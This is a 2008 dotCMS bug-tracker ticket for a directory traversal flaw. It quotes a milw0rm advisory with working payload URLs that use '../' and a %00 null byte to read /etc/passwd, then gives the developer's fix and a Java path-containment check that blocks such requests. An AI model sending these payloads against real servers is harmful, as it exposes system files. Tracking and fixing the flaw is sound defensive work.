
Key: DOTCMS-1837
Type: Bug
Status: Released
Resolution: Released
Priority: Blocker
Assignee: Testing User
Reporter: Jennifer Canup
Watchers: 2
dotCMS

Security Exploit -- directory traversal

Created: August 16, 2008 2:48 PM   Updated: July 23, 2009 11:54 AM  Due: 8/16/08
Component/s: a. Unknown
Affects Version/s: None
Fix Version/s: 1.6.5

Time Tracking:
Not Specified

Environment: all


Description
http://www.milw0rm.com/exploits/6247

++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ script:dotCMS
+ home: http://www.dotcms.org
+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
+ founder: Don of h4cky0u.org
+ Vulnerability: Directory traversal
++++++++++++++++++++++++++++++++++++++++++++++++++++++

exploit:
/index.dot?id=../../../../../../../../etc/passwd%00.jpg
/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

example:
http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

solution:
Script should filter meta characters from user input.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-08-15]

Comments
Jennifer Canup - August 16, 2008 2:51 PM
This issue was reported yesterday and our servers have already been hit. We had planned to launch our new public site on Monday, but until this vulnerability is resolved we will not be able to launch.

Will Ezell - August 16, 2008 4:59 PM
This has been fixed. We are checking to ensure that the file being served is within the accepted directories of include files. This will prevent directory traversal.
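
The containment check described in the last comment, sketched as an added example (this is not dotCMS's own code or the actual fix): the requested include is resolved against each allowed root and served only if its real path stays inside that root. The class name `IncludeGuard`, the method `resolveInclude`, and the temporary directory layout are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.List;

public class IncludeGuard {

    // Returns the real path of the requested include if it lies inside one of
    // the allowed roots, or null if the request must be refused.
    static Path resolveInclude(List<Path> allowedRoots, String requested) throws IOException {
        // A decoded %00 hides the real target behind a harmless-looking
        // extension (".jpg", ".html"), so a NUL anywhere is refused outright.
        if (requested == null || requested.isEmpty() || requested.indexOf('\0') >= 0) {
            return null;
        }
        for (Path root : allowedRoots) {
            Path realRoot = root.toRealPath();
            // normalize() collapses "../" segments before the comparison.
            Path candidate = realRoot.resolve(requested).normalize();
            if (!candidate.startsWith(realRoot) || !Files.isRegularFile(candidate)) {
                continue;
            }
            // Resolve symlinks and compare again, so a link inside the root
            // cannot point the include at a file outside it.
            Path real = candidate.toRealPath();
            if (real.startsWith(realRoot)) {
                return real;
            }
        }
        return null;
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout: one allowed include root holding one file.
        Path root = Files.createTempDirectory("includes");
        Files.createDirectories(root.resolve("news"));
        Files.write(root.resolve("news/item.html"), "ok".getBytes());

        String[] requests = {   // constructed sample values of the id parameter
            "news/item.html",
            "../../../../../../../../etc/passwd\0.jpg",
            "../../../../../../../../etc/passwd",
            "/etc/passwd",
        };
        for (String id : requests) {
            Path served = resolveInclude(List.of(root), id);
            System.out.println((served != null ? "SERVE  " : "REFUSE ") + id.replace("\0", "%00"));
        }
    }
}
```

`Path.startsWith` compares whole path components, so a sibling directory whose name merely begins with the root's name does not pass the check.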